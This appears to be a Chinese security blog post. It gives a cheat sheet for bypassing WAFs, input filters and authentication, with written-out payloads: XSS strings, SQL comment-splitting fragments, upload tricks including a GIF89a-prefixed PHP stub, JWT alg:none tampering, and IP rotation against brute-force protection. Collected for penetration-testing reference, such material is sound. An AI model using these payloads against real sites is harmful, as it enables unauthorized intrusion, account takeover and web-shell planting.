网络安全为人民

师傅们好👋：本公众号现在已开启对常读和星标的公众号展示大图推送，为了不错过我们的网络安全干货，请星标🌟我们。这样，您就能快速掌握最新动态，与我们共同守护网络空间！感谢您的关注和支持！💖

一、WAF 绕过

1. 编码/混淆绕过

• URL编码：%3Cscript%3E → <script>
• 双重URL编码：%253Cscript%253E → <script>
• Unicode编码：u003cscriptu003e → <script>
• HTML实体编码：<script> → <script>
• Base64编码：PHNjcmlwdD4= → <script>

2. 协议/注释分割

• HTTP参数污染（HPP）：?id=1&id= UNION SELECT 1,2,3--
• 注释分割SQL语句：UNION/**/SELECT 1,2,3
• 换行符绕过：%0A、%0D分隔敏感关键词

3. 特殊字符干扰

• NULL字节（%00）：example.php%00.jpg → 欺骗文件类型检测
• 非常见空格符：%09(Tab)、%0C(换页符)
• 大小写混合：UnIoN SeLeCt → 规避关键词过滤

二、输入过滤绕过

1. SQL注入绕过

2. XSS绕过

• 事件属性绕过：<img src=x onerror=alert(1)>
• 伪协议绕过SVG：<svg/onload=alert(1)>
• 大小写混淆：<ScRiPt>alert(1)</sCriPt>
• 编码上下文逃逸：<a href="javascript:%61lert(1)">
• CSS表达式：<div style="color:expression(alert(1))">

3. 文件上传绕过

• 后缀名绕过：.php5、.phtml、.php%00.jpg
• Content-Type篡改：image/jpeg → 实际传PHP文件
• 魔数伪造：添加GIF文件头GIF89a; <?php [...] ?>
• 路径拼接漏洞：filename="test.php/."

三、认证/授权绕过

1. Cookie/JWT操纵

• Cookie参数篡改：role=admin → 普通用户提权
• JWT算法修改：篡改alg:none + 移除签名
• JWT密钥爆破：弱密钥（如secret、password）

2. 暴力破解保护绕过

• IP轮换：通过代理池规避IP封锁
• 延迟请求：降低请求频率至阈值以下
• 账号爆破：使用已知账号爆破密码（先枚举有效用户）

3. CSRF Token绕过

• 移除Token参数：尝试直接提交无Token的请求
• Token固定值漏洞：分析是否与服务端验证逻辑无关
• 同域Token窃取：通过XSS获取Token